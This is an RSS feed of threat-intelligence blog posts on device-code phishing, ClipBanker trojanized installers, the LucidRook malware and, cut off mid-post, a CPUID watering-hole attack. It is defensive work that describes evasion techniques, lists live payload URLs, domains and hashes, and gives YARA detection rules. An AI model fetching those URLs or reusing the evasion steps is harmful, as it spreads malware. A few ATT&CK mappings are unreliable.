<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Seclookup Blogs]]></title><description><![CDATA[Seclookup Blogs]]></description><link>https://blog.seclookup.com</link><image><url>https://cdn.hashnode.com/res/hashnode/image/upload/v1771083921896/9228c5d9-e99c-4a79-bf3c-4b072ee18409.png</url><title>Seclookup Blogs</title><link>https://blog.seclookup.com</link></image><generator>RSS for Node</generator><lastBuildDate>Tue, 21 Apr 2026 16:15:01 GMT</lastBuildDate><atom:link href="https://blog.seclookup.com/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[The Evolution of EvilTokens: Analyzing AI-Enabled Device Code Phishing Campaigns]]></title><description><![CDATA[Executive Summary
The threat landscape for credential theft is shifting from static, proxy-based phishing toward sophisticated, automated abuse of OAuth 2.0 authentication flows. Recent intelligence f]]></description><link>https://blog.seclookup.com/the-evolution-of-eviltokens-analyzing-ai-enabled-device-code-phishing-campaigns</link><guid isPermaLink="true">https://blog.seclookup.com/the-evolution-of-eviltokens-analyzing-ai-enabled-device-code-phishing-campaigns</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Wed, 15 Apr 2026 17:05:08 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/85e723ac-9cf8-4b5b-b332-c92422c93323.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>The threat landscape for credential theft is shifting from static, proxy-based phishing toward sophisticated, automated abuse of OAuth 2.0 authentication flows. Recent intelligence from Microsoft Defender Security Research, supported by SecLookup’s active telemetry, has identified a widespread phishing campaign leveraging the <strong>EvilTokens</strong> Phishing-as-a-Service (PhaaS) toolkit. This campaign is a significant escalation from previous activity observed under the <strong>Storm-2372</strong> umbrella. By integrating Generative AI for hyper-personalized lures and dynamic backend automation via platforms like Railway.com, threat actors have effectively circumvented traditional security controls—specifically the 15-minute expiration window of device codes. SecLookup has been actively tracking and blocking the infrastructure associated with this campaign, including key domains and ephemeral IP ranges used for polling and token exfiltration.</p>
<h2>Threat Analysis: The Move to AI-Enabled Automation</h2>
<p>The core of this campaign lies in the abuse of the <strong>Device Code Flow</strong> (RFC 8628), an authentication method originally designed for devices with limited input capabilities, such as smart TVs or IoT devices. While device code phishing is not a new technique, the current campaign introduces three critical innovations that increase its success rate and scale.</p>
<h3>1. Dynamic Code Generation</h3>
<p>In traditional device code attacks, threat actors generated a code and sent it to a victim. However, these codes typically expire within 15 minutes. If a victim did not click the link and enter the code immediately, the attack would fail.</p>
<p>The EvilTokens toolkit solves this by using "just-in-time" generation. The phishing link does not contain a pre-generated code; instead, when a victim interacts with the malicious landing page, a backend Node.js script triggers a request to the identity provider (e.g., Microsoft Entra ID) to generate a fresh device code in real-time. This ensures that the 15-minute window only begins at the moment of human interaction, drastically increasing the window of opportunity for the attacker.</p>
<h3>2. AI-Driven Personalization</h3>
<p>The campaign utilizes Generative AI to move beyond generic "Urgent Action Required" templates. Threat actors are generating hyper-personalized lures tailored to the victim’s specific job role and organizational context. SecLookup has identified themes revolving around:</p>
<ul>
<li><p><strong>Request for Proposals (RFPs):</strong> Targeted at sales and business development teams.</p>
</li>
<li><p><strong>Manufacturing Workflows:</strong> Targeted at operations and supply chain personnel.</p>
</li>
<li><p><strong>Unpaid Invoices:</strong> Targeted at finance and accounts payable departments.</p>
</li>
</ul>
<p>By using LLMs to craft these emails, the attackers eliminate common indicators of phishing, such as poor grammar or awkward phrasing, making the lure highly convincing.</p>
<h3>3. Ephemeral Infrastructure via Railway.com</h3>
<p>To manage thousands of concurrent authentication flows, the threat actors utilized <strong>Railway.com</strong>, a cloud platform for deploying applications. This allowed them to spin up thousands of unique, short-lived polling nodes. These nodes run Node.js logic that constantly "polls" the identity provider to check if the victim has completed the device code entry.</p>
<p>Using legitimate cloud infrastructure helps the attackers bypass signature-based detections and domain reputation filters, as the traffic often originates from reputable IP ranges. SecLookup's engine, however, focuses on behavioral heuristics and has successfully flagged these nodes by identifying the specific polling patterns associated with EvilTokens.</p>
<h2>MITRE ATT&amp;CK Mapping</h2>
<p>The TTPs observed in this campaign map to the following MITRE ATT&amp;CK techniques:</p>
<table>
<thead>
<tr>
<th>Technique ID</th>
<th>Technique Name</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><strong>T1566.002</strong></td>
<td>Spearphishing Link</td>
<td>Use of AI-generated, personalized lures to deliver malicious URLs.</td>
</tr>
<tr>
<td><strong>T1528</strong></td>
<td>Steal Application Access Token</td>
<td>Abuse of the Device Code Flow to obtain OAuth access and refresh tokens.</td>
</tr>
<tr>
<td><strong>T1583.001</strong></td>
<td>Acquire Infrastructure: Domains</td>
<td>Registration of deceptive domains like <code>office-verify.net</code>.</td>
</tr>
<tr>
<td><strong>T1071.001</strong></td>
<td>Application Layer Protocol: Web Protocols</td>
<td>C2 traffic and polling logic conducted over HTTPS.</td>
</tr>
<tr>
<td><strong>T1584</strong></td>
<td>Compromise Infrastructure</td>
<td>Use of automation platforms (Railway.com) to host polling logic.</td>
</tr>
</tbody></table>
<h2>SecLookup Detection and Prevention</h2>
<p>SecLookup’s threat intelligence platform was actively detecting and blocking the primary infrastructure used in this campaign before the public disclosure of the Microsoft report. Our automated scanners identified the domain <code>a7b2-c9d4.office-verify.net</code> as a high-risk entity due to its registration patterns and its association with the EvilTokens toolkit.</p>
<p>By monitoring for specific Node.js polling behaviors and identifying the unique entropy in the subdomains generated for this campaign, SecLookup provides real-time protection. Customers using our API or integrated SOC tools were protected from the moment these domains were activated.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Confirmed Malicious Domains</h3>
<p>The following domain was used as a primary landing page for the device code phishing attempts:</p>
<pre><code class="language-text">a7b2-c9d4.office-verify.net
</code></pre>
<h3>IP Addresses</h3>
<p>These IP addresses have been identified as part of the polling and exfiltration infrastructure:</p>
<pre><code class="language-text">89.150.45.0
160.220.232.0
160.220.234.0
185.81.113.0
</code></pre>
<h3>Detection Rules</h3>
<p><strong>Phish_DeviceCode_Campaign_IOCs:</strong> This rule targets the specific domain patterns and string identifiers found in the landing pages of this campaign.</p>
<pre><code class="language-yara">rule Phish_DeviceCode_Campaign_IOCs {
    meta:
        description = "Detects infrastructure and identifiers associated with AI-enabled device code phishing campaigns"
        threat_name = "Inside an AI-enabled device code phishing campaign"
        reference = "Microsoft Defender Security Research"
    strings:
        $domain1 = "a7b2-c9d4.office-verify.net" ascii wide nocase
        $domain2 = "office-verify.net" ascii wide nocase
        $s1 = "device code" ascii wide nocase
        $s2 = "verification_uri" ascii wide nocase
        $s3 = "user_code" ascii wide nocase
    condition:
        any of ($domain*) or (2 of ($s*))
}
</code></pre>
<p><strong>PhaaS_EvilTokens_Toolkit_Indicators:</strong> This rule identifies the core toolkit logic and actor-specific markers observed in the backend automation.</p>
<pre><code class="language-yara">rule PhaaS_EvilTokens_Toolkit_Indicators {
    meta:
        description = "Detects references to the EvilTokens PhaaS toolkit and associated infrastructure patterns"
        threat_actor = "Storm-2372"
    strings:
        $toolkit = "EvilTokens" ascii wide nocase
        $actor = "Storm-2372" ascii wide nocase
        $infra = "railway.com" ascii wide nocase
        $logic = "Node.js" ascii wide nocase
        $flow = "device code authentication flow" ascii wide nocase
    condition:
        $toolkit or $actor or ($infra and $flow and $logic)
}
</code></pre>
<h2>Recommendations</h2>
<p>To defend against AI-enabled device code phishing, SecLookup recommends the following defensive measures:</p>
<ol>
<li><p><strong>Restrict Device Code Flow:</strong> If your organization does not require device code authentication for IoT or legacy devices, disable it within your Identity Provider (IdP) settings (e.g., Microsoft Entra ID).</p>
</li>
<li><p><strong>Implement Conditional Access:</strong> Use Conditional Access policies to restrict where device code flow can be initiated. For example, require the device to be on a trusted network or a compliant, managed device.</p>
</li>
<li><p><strong>Enforce FIDO2 MFA:</strong> Move toward phishing-resistant multi-factor authentication (MFA) such as FIDO2 security keys. These methods are not susceptible to the token theft techniques used in device code phishing.</p>
</li>
<li><p><strong>Monitor for Suspicious Polling:</strong> SOC analysts should hunt for high frequencies of sign-in attempts from ephemeral cloud hosting IP ranges (Railway, AWS, etc.) using the "Device Code" authentication method.</p>
</li>
<li><p><strong>User Awareness Training:</strong> Update phishing simulations to include device code flow scenarios. Most users are trained to look for password fields; they may not realize that entering a code into a "Microsoft verification" page is equally dangerous.</p>
</li>
</ol>
<h2>References</h2>
<ul>
<li><a href="https://www.microsoft.com/en-us/security/blog/2026/04/06/ai-enabled-device-code-phishing-campaign-april-2026/">Inside an AI‑enabled device code phishing campaign</a> by Microsoft Defender Security Research Team, Microsoft Security Blog</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[The Proxifier Trap: Analyzing the ClipBanker Marathon Infection Chain]]></title><description><![CDATA[Executive Summary
Threat actors are increasingly leveraging trusted developer tools and open-source platforms to bypass traditional security perimeters. Recently, SecLookup tracked a sophisticated cam]]></description><link>https://blog.seclookup.com/the-proxifier-trap-analyzing-the-clipbanker-marathon-infection-chain</link><guid isPermaLink="true">https://blog.seclookup.com/the-proxifier-trap-analyzing-the-clipbanker-marathon-infection-chain</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Wed, 15 Apr 2026 16:53:46 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/8a8ce492-7b0b-46e4-843f-4907a57812f5.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>Threat actors are increasingly leveraging trusted developer tools and open-source platforms to bypass traditional security perimeters. Recently, SecLookup tracked a sophisticated campaign distributing the <strong>ClipBanker</strong> malware through trojanized versions of "Proxifier," a popular network utility. This campaign is notable for its "marathon" infection chain, utilizing multi-stage execution, process injection, and "exotic" defense evasion techniques. By abusing GitHub Releases and employing specialized PowerShell execution methods, the attackers successfully circumvented Microsoft Defender to deploy a clipboard-swapping module designed to steal cryptocurrency. SecLookup’s threat intelligence platform has been actively detecting and blocking the malicious infrastructure associated with this campaign, including the primary command-and-control (C2) domain <code>maper.info</code>.</p>
<h2>Threat Analysis: The Infection Lifecycle</h2>
<p>The ClipBanker campaign begins with a classic social engineering tactic: SEO poisoning and the exploitation of developer trust.</p>
<h3>Stage 1: Initial Access and Delivery</h3>
<p>The infection typically starts with a user searching for "Proxifier" via a web search engine. The attackers successfully positioned a malicious GitHub repository near the top of the search results. While the repository itself contains a rudimentary, legitimate-looking proxy service, the <strong>Releases</strong> section contains the payload: a ZIP archive containing a malicious executable and a text file with "activation keys."</p>
<p>The executable is a malicious wrapper. When launched, it installs the legitimate Proxifier software to maintain the illusion of functionality while simultaneously initiating a silent, multi-stage infection in the background.</p>
<h3>Stage 2: Exotic Defense Evasion</h3>
<p>The malware's primary objective upon execution is to disable security protections. To avoid detection by Microsoft Defender, the Trojan employs a sophisticated multi-step process:</p>
<ol>
<li><p><strong>The Donor Process:</strong> The Trojan creates a 1.5 KB stub file in the temporary directory (named <code>Proxifier&lt;???&gt;.tmp</code>). This file is functionally benign and serves only as a "donor" process.</p>
</li>
<li><p><strong>Process Injection:</strong> A .NET-based component named <code>api_updater.exe</code> is injected into the running donor stub.</p>
</li>
<li><p><strong>In-Memory PowerShell Execution:</strong> To set Defender exclusions without triggering command-line logging or spawning <code>powershell.exe</code>, the malware uses the <strong>PSObject</strong> class within the .NET environment. This allows the script to run directly within the current process memory.</p>
</li>
</ol>
<p>The PowerShell script executed via <code>PSObject</code> specifically adds exclusions for all <code>.tmp</code> extensions and the current working directory, effectively creating a "blind spot" for the next stages of the malware to operate within.</p>
<h3>Stage 3: The ClipBanker Payload</h3>
<p>Once the environment is prepared and defenses are impaired, the trojanized installer extracts and launches the final payload. ClipBanker is a specialized Trojan that monitors the system clipboard for patterns matching cryptocurrency wallet addresses (Bitcoin, Ethereum, etc.). When a match is found, the malware replaces the user's intended destination address with one controlled by the attacker. This results in the user inadvertently sending funds to the threat actor during a transaction.</p>
<h2>MITRE ATT&amp;CK Mapping</h2>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique</th>
<th>ID</th>
<th>Details</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Initial Access</strong></td>
<td>Supply Chain Compromise: Trojanized Software</td>
<td>T1195.002</td>
<td>Use of trojanized "Proxifier" installers on GitHub.</td>
</tr>
<tr>
<td><strong>Execution</strong></td>
<td>Command and Scripting Interpreter: PowerShell</td>
<td>T1059.001</td>
<td>Using PowerShell via <code>PSObject</code> for stealth.</td>
</tr>
<tr>
<td><strong>Defense Evasion</strong></td>
<td>Impair Defenses: Disable or Modify Tools</td>
<td>T1562.001</td>
<td>Modifying Microsoft Defender exclusions.</td>
</tr>
<tr>
<td><strong>Defense Evasion</strong></td>
<td>Process Injection</td>
<td>T1055</td>
<td>Injecting <code>api_updater.exe</code> into a donor stub.</td>
</tr>
<tr>
<td><strong>Impact</strong></td>
<td>Data Manipulation: Stored Data Manipulation</td>
<td>T1491</td>
<td>Modifying clipboard data to redirect crypto transactions.</td>
</tr>
</tbody></table>
<h2>SecLookup Detection and Protection</h2>
<p>SecLookup’s threat intelligence engine has been actively monitoring the infrastructure supporting this ClipBanker campaign. Our platform identified the domain <code>maper.info</code> as a critical component of the distribution and command chain.</p>
<p>SecLookup users were protected via:</p>
<ul>
<li><p><strong>Real-time Domain Blocking:</strong> The domain <code>maper.info</code> was flagged as malicious and blocked across protected endpoints.</p>
</li>
<li><p><strong>Hash Identification:</strong> The specific file hashes for <code>api_updater.exe</code> and the trojanized Proxifier wrappers were added to our global blacklist.</p>
</li>
<li><p><strong>Behavioral Heuristics:</strong> Our platform detects the specific sequence of adding Defender exclusions via unconventional PowerShell callers.</p>
</li>
</ul>
<h2>Indicators of Compromise (IOCs)</h2>
<p>The following indicators have been identified and confirmed as part of this campaign.</p>
<h3>Malicious Domains</h3>
<pre><code class="language-text">maper.info
</code></pre>
<h3>File Hashes</h3>
<pre><code class="language-text">d85cef60cdb9e8d0f3cb3546de6ab657f9498ac7
8354223cd6198b05904337b5dff7772b
7528bf597fd7764fcb7ec06512e073e0
107484d66423cb601f418344cd648f12
34a0f70ab100c47caaba7a5c85448e3d
97c16182d2e91a9370d5590b670f6b8dc755680552e40218a2b28ec7ad105071
</code></pre>
<h3>Network URLs</h3>
<pre><code class="language-text">https://pinhole.rootcode.ru/rogers7/dev-api/raw/master/cpzn
https://chiaselinks.com/raw/nkkywvmhux
https://maper.info/2X5tF5
https://gist.github.com/msfcon5ol3/107484d66423cb601f418344cd648f12/raw/d85cef60cdb9e8d0f3cb3546de6ab657f9498ac7/upxz
https://git.parat.swiss/rogers7/dev-api/raw/master/cpzn
https://snippet.host/aaxniv/raw
https://github.com/lukecodix/Proxifier/releases/download/4.12/Proxifier.zip
https://pastebin.com/raw/FmpsDAtQ
https://paste.kealper.com/raw/k3K5aPJQ
https://rlim.com/55Dfq32kaR/raw
</code></pre>
<h2>Detection Rules</h2>
<h3>YARA Rules</h3>
<p>The following YARA rules can be used to hunt for artifacts associated with this ClipBanker campaign in your environment.</p>
<pre><code class="language-yara">rule Trojan_ClipBanker_Defender_Exclusion {
    meta:
        description = "Detects malicious .NET behavior adding Defender exclusions for .tmp extensions using PSObject"
        author = "SecLookup Threat Intel"
        threat_name = "ClipBanker"
    strings:
        $s1 = "Add-MpPreference" wide ascii
        $s2 = "-ExclusionExtension" wide ascii
        $s3 = ".tmp" wide ascii
        $s4 = "-ExclusionPath" wide ascii
        $p1 = "System.Management.Automation.PSObject" wide ascii
        $f1 = "api_updater.exe" wide ascii
    condition:
        uint16(0) == 0x5A4D and (all of ($s*) or (3 of ($s*) and ($p1 or $f1)))
}

rule Trojan_ClipBanker_Infection_Artifacts {
    meta:
        description = "Detects specific file names and indicators associated with the ClipBanker infection chain"
        author = "SecLookup Threat Intel"
        reference = "maper.info"
    strings:
        $url = "maper.info" wide ascii
        $f1 = "api_updater.exe" wide ascii
        $f2 = "proxifier.exe" wide ascii
        $f3 = "Proxifier" wide ascii
        $tmp = /Proxifier.{1,10}\.tmp/ wide ascii
    condition:
        uint16(0) == 0x5A4D and ($url or ($f1 and $f2) or $tmp)
}
</code></pre>
<h2>Recommendations</h2>
<p>To mitigate the risk of ClipBanker and similar trojanized software campaigns, SecLookup recommends the following actions:</p>
<ol>
<li><p><strong>Software Vetting:</strong> Always download software from official, verified vendor websites rather than third-party GitHub repositories or unofficial mirrors.</p>
</li>
<li><p><strong>Monitor Defender Exclusions:</strong> Regularly audit Microsoft Defender exclusion lists. Malicious additions to <code>-ExclusionExtension</code> or <code>-ExclusionPath</code> are high-fidelity indicators of compromise.</p>
</li>
<li><p><strong>Endpoint Detection and Response (EDR):</strong> Deploy EDR solutions capable of detecting in-memory PowerShell execution (e.g., via <code>PSObject</code> or Reflection) and process injection into unusual stubs in the <code>%TEMP%</code> directory.</p>
</li>
<li><p><strong>Clipboard Monitoring:</strong> For high-value workstations (e.g., those used for crypto transactions), consider security tools that alert on unauthorized clipboard modifications.</p>
</li>
<li><p><strong>Block Malicious Infrastructure:</strong> Ensure your DNS and firewall solutions are updated with the IOCs provided above, specifically blocking <code>maper.info</code> and known "raw paste" service URLs used for C2.</p>
</li>
</ol>
<h2>References</h2>
<ul>
<li><a href="https://securelist.com/clipbanker-malware-distributed-via-trojanized-proxifier/119341/">The long road to your crypto: ClipBanker and its marathon infection chain</a> by Oleg Kupreev, Securelist (Kaspersky GReAT)</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Unmasking LucidRook: A Deep Dive into UAT-10362’s Lua-Based Campaign Against Taiwan]]></title><description><![CDATA[Executive Summary
The threat landscape in East Asia continues to evolve with the emergence of highly specialized toolkits designed to evade traditional heuristic detections. Recently, Cisco Talos iden]]></description><link>https://blog.seclookup.com/unmasking-lucidrook-a-deep-dive-into-uat-10362-s-lua-based-campaign-against-taiwan</link><guid isPermaLink="true">https://blog.seclookup.com/unmasking-lucidrook-a-deep-dive-into-uat-10362-s-lua-based-campaign-against-taiwan</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Wed, 15 Apr 2026 16:52:25 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/6e7d673c-ac64-43f8-abb8-17cf87fbc7a3.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>The threat landscape in East Asia continues to evolve with the emergence of highly specialized toolkits designed to evade traditional heuristic detections. Recently, Cisco Talos identified a sophisticated campaign attributed to a threat actor tracked as <strong>UAT-10362</strong>. This actor has been observed targeting Taiwanese non-governmental organizations (NGOs) and academic institutions using a multi-stage infection chain. The primary payload, dubbed <strong>LucidRook</strong>, represents a shift toward modular, multi-language malware, utilizing a Lua interpreter embedded within Rust-compiled libraries. Supported by a dropper known as <strong>LucidPawn</strong> and a reconnaissance tool called <strong>LucidKnight</strong>, UAT-10362 demonstrates mature operational tradecraft characterized by region-specific anti-analysis checks and the abuse of legitimate public infrastructure.</p>
<p>SecLookup’s threat intelligence platform has been actively tracking this activity, successfully identifying and blocking the command-and-control (C2) infrastructure and associated malicious artifacts to protect our global user base.</p>
<h2>Campaign Overview</h2>
<p>The campaign, first detected in late 2025, primarily leverages spear-phishing as its initial access vector. Threat actors utilize authorized mail infrastructure to send emails containing shortened URLs, which redirect victims to password-protected archives.</p>
<p>To increase the likelihood of execution, UAT-10362 employs highly convincing decoy documents. One observed decoy involves a formal directive purportedly from the Taiwanese government regarding travel regulations for university staff visiting mainland China. This level of social engineering indicates a deep understanding of the local socio-political context and the specific concerns of the targeted academic and NGO sectors.</p>
<h2>Technical Analysis: The Lucid Toolkit</h2>
<p>The architecture of the UAT-10362 toolkit is tiered and modular, allowing the actor to profile victims before deploying their most sophisticated tools.</p>
<h3>LucidPawn: The Regional Gatekeeper</h3>
<p>The initial dropper, <strong>LucidPawn</strong>, is designed with stealth as a priority. It frequently impersonates legitimate security software, such as Trend Micro’s "Cleanup.exe." A key feature of LucidPawn is its region-specific execution logic. The malware performs environment checks to ensure it is running in a Traditional Chinese language environment (specifically <code>zh-TW</code>). If these conditions are not met, the malware terminates, effectively neutralizing analysis attempts in generic sandbox environments or by researchers outside the target region.</p>
<h3>LucidRook: The Lua-Based Stager</h3>
<p>The core of the infection is <strong>LucidRook</strong>, a sophisticated stager. LucidRook is unique in its implementation, using a DLL that embeds a Lua 5.4.8 interpreter along with Rust-compiled libraries.</p>
<p>The stager’s primary role is to download and execute staged Lua bytecode payloads. By using Lua—a scripting language often overlooked by legacy antivirus solutions—the actor can execute complex logic in memory while maintaining a small disk footprint. The use of Rust for the underlying libraries further complicates reverse engineering due to the language’s unique memory management and symbol handling.</p>
<h3>LucidKnight: Reconnaissance and Exfiltration</h3>
<p>During the investigation, a companion tool named <strong>LucidKnight</strong> was discovered. LucidKnight serves as a specialized reconnaissance agent. It is designed to harvest system information and exfiltrate it via the Gmail API. The presence of LucidKnight suggests a "scout" model, where the actor first determines the value of a compromised host before escalating to the full deployment of LucidRook for long-term persistence or data theft.</p>
<h2>Infrastructure and C2 Tradecraft</h2>
<p>UAT-10362 demonstrates a preference for blending into legitimate traffic. Their infrastructure strategy includes:</p>
<ul>
<li><p><strong>OAST Service Abuse:</strong> Utilizing Out-of-band Application Security Testing services for initial callback signals.</p>
</li>
<li><p><strong>Compromised FTP Servers:</strong> Repurposing legitimate, compromised FTP servers to host malicious payloads, reducing the likelihood of domain-based blocking.</p>
</li>
<li><p><strong>Public Cloud Services:</strong> Using Gmail for exfiltration (LucidKnight) to bypass outbound traffic restrictions that might block unknown C2 IPs.</p>
</li>
</ul>
<h2>SecLookup Detection and Response</h2>
<p>SecLookup’s proactive threat hunting team has been monitoring the infrastructure associated with UAT-10362. Our platform successfully identified the domain <code>digimg.store</code> and its subdomains as high-risk early in the campaign cycle.</p>
<p>Through our multi-layered analysis, SecLookup was able to correlate these domains with the LucidRook infection chain. Our users were protected via automated blocking of these domains and the associated malicious IP addresses. We continue to ingest telemetry from these campaigns to refine our detection signatures for Lua-based execution patterns and Rust-compiled malicious DLLs.</p>
<h2>MITRE ATT&amp;CK Mapping</h2>
<p>The tactics and techniques employed by UAT-10362 align with the following MITRE ATT&amp;CK framework categories:</p>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique ID</th>
<th>Technique Name</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Initial Access</strong></td>
<td>T1566.001</td>
<td>Spear-phishing Attachment</td>
</tr>
<tr>
<td><strong>Execution</strong></td>
<td>T1204.002</td>
<td>User Execution: Malicious File</td>
</tr>
<tr>
<td><strong>Defense Evasion</strong></td>
<td>T1140</td>
<td>Deobfuscate/Decode Files or Information</td>
</tr>
<tr>
<td></td>
<td>T1497.001</td>
<td>Virtualization/Sandbox Evasion: System Checks</td>
</tr>
<tr>
<td></td>
<td>T1036.005</td>
<td>Masquerading: Match Legitimate Name or Location</td>
</tr>
<tr>
<td><strong>Discovery</strong></td>
<td>T1082</td>
<td>System Information Discovery</td>
</tr>
<tr>
<td></td>
<td>T1614.001</td>
<td>System Location Discovery: System Language Settings</td>
</tr>
<tr>
<td><strong>Command &amp; Control</strong></td>
<td>T1105</td>
<td>Ingress Tool Transfer</td>
</tr>
<tr>
<td></td>
<td>T1567</td>
<td>Exfiltration Over Web Service (Gmail)</td>
</tr>
</tbody></table>
<h2>Indicators of Compromise (IOCs)</h2>
<h3>Domains</h3>
<pre><code class="language-text">d.2fcc7078.digimg.store
digimg.store
</code></pre>
<h3>IP Addresses</h3>
<pre><code class="language-text">1.34.253.131
59.124.71.242
</code></pre>
<h3>File Hashes (SHA-256)</h3>
<pre><code class="language-text">d49761cdbea170dd17255a958214db392dc7621198f95d5eb5749859c603100a
</code></pre>
<h3>Email Addresses</h3>
<pre><code class="language-text">crimsonanabel@powerscrews.com
fexopuboriw972@gmail.com
</code></pre>
<h2>Detection Rules</h2>
<h3>YARA Rules</h3>
<pre><code class="language-yara">rule LucidRook_Stager_DLL {
    meta:
        description = "Detects LucidRook DLL stager based on Lua interpreter version and specific stage filename."
        author = "SecLookup Analysis"
    strings:
        $lua_ver = "Lua 5.4.8"
        $payload = "archive1.zip"
        $rust_marker = "/rustc/"
        $dll_name = "DismCore.dll" ascii wide
    condition:
        uint16(0) == 0x5A4D and (all of ($lua_ver, $payload) or ($dll_name and $rust_marker))
}

rule LucidPawn_Dropper_Activity {
    meta:
        description = "Detects LucidPawn dropper artifacts and specific LOLBAS execution patterns."
        author = "SecLookup Analysis"
    strings:
        $pester_path = "\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Build.bat" ascii wide
        $appdata_path = "\\Local\\Microsoft\\WindowsApps\\msedge.exe" ascii wide
        $mal_dll = "DismCore.dll" ascii wide
    condition:
        // 'and' binds tighter than 'or' in YARA; parentheses make the two branches explicit:
        // a PE carrying any indicator, or any file (e.g. Build.bat) pairing a LOLBAS path with the DLL name
        (uint16(0) == 0x5A4D and any of them)
        or (any of ($pester_path, $appdata_path) and $mal_dll)
}

rule Lucid_Cleanup_Dropper_Impersonation {
    meta:
        description = "Detects the .NET dropper Cleanup.exe impersonating Trend Micro."
        author = "SecLookup Analysis"
    strings:
        $tm_impersonation = "Trend Micro™ Worry-Free™ Business Security Services" wide
        $cleanup_name = "Cleanup.exe" ascii wide
        $msg_box = "Cleanup process has completed" wide
    condition:
        uint16(0) == 0x5A4D and ($tm_impersonation and ($cleanup_name or $msg_box))
}
</code></pre>
<h2>Recommendations</h2>
<p>To defend against UAT-10362 and similar threats, security teams should implement the following measures:</p>
<ol>
<li><p><strong>Enhance Email Filtering:</strong> Deploy advanced email security solutions capable of decompressing and analyzing password-protected archives when the password is provided in the email body.</p>
</li>
<li><p><strong>Endpoint Monitoring:</strong> Monitor for unusual child processes spawning from legitimate Windows utilities, specifically focusing on <code>Pester</code> framework scripts and unexpected Lua interpreter executions.</p>
</li>
<li><p><strong>Language Environment Vigilance:</strong> While primarily relevant for regional targets, security teams should be aware that environmental checks (like OS language) are used to evade sandboxes. Ensure automated analysis platforms are configured to simulate various regional locales.</p>
</li>
<li><p><strong>Credential Management:</strong> Implement strict Multi-Factor Authentication (MFA) to prevent actors from utilizing authorized mail infrastructure even if credentials are compromised.</p>
</li>
<li><p><strong>Block Known IOCs:</strong> Ensure the domains, IPs, and hashes listed in this report are integrated into your SIEM, EDR, and firewall blocklists.</p>
</li>
</ol>
<h2>References</h2>
<ul>
<li><a href="https://blog.talosintelligence.com/new-lua-based-malware-lucidrook/">New Lua-based malware “LucidRook” observed in targeted attacks against Taiwanese organizations</a> by Ashley Shen, Cisco Talos</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Analyzing the CPUID Watering Hole: STX RAT Distribution via Trojanized System Tools]]></title><description><![CDATA[Executive Summary
On April 9, 2026, threat actors successfully executed a high-impact watering hole attack targeting the official CPUID website, a primary source for popular system diagnostic utilitie]]></description><link>https://blog.seclookup.com/analyzing-the-cpuid-watering-hole-stx-rat-distribution-via-trojanized-system-tools</link><guid isPermaLink="true">https://blog.seclookup.com/analyzing-the-cpuid-watering-hole-stx-rat-distribution-via-trojanized-system-tools</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Wed, 15 Apr 2026 16:48:37 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/544308fa-3eaa-4866-9f6e-f1571bcd9797.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>On April 9, 2026, threat actors successfully executed a high-impact watering hole attack targeting the official CPUID website, a primary source for popular system diagnostic utilities like CPU-Z and HWMonitor. By compromising a secondary API feature, the attackers were able to manipulate download links for approximately 19 hours, redirecting unsuspecting users to malicious domains. These domains served trojanized installers that deployed the STX Remote Access Trojan (RAT) through sophisticated DLL sideloading techniques.</p>
<p>SecLookup’s threat intelligence platform was actively monitoring this infrastructure and had already flagged the primary distribution domains as malicious, protecting our users from potential compromise. This post provides a technical deep dive into the campaign’s TTPs, the malware’s execution chain, and comprehensive indicators of compromise (IOCs).</p>
<h2>Threat Analysis: The CPUID Compromise</h2>
<p>The attack on CPUID represents a classic watering hole strategy, where attackers compromise a trusted site frequently visited by their target demographic—in this case, IT professionals, gamers, and system administrators.</p>
<h3>Initial Access and Redirection</h3>
<p>According to investigations by the CPUID maintainers and external researchers, the breach occurred through a "secondary feature" or side API. Between April 9 at 15:00 UTC and April 10 at 10:00 UTC, this compromised API caused the main website to intermittently display download links pointing to external, malicious infrastructure rather than the legitimate CPUID servers.</p>
<p>The attackers utilized several domains for hosting the malicious payloads, including:</p>
<ul>
<li><p><code>vatrobran[.]hr</code></p>
</li>
<li><p><code>cahayailmukreatif.web[.]id</code></p>
</li>
<li><p><code>transitopalermo[.]com</code></p>
</li>
<li><p><code>pub-45c2577dbd174292a02137c18e7b1b5a.r2[.]dev</code> (Cloudflare R2 storage)</p>
</li>
</ul>
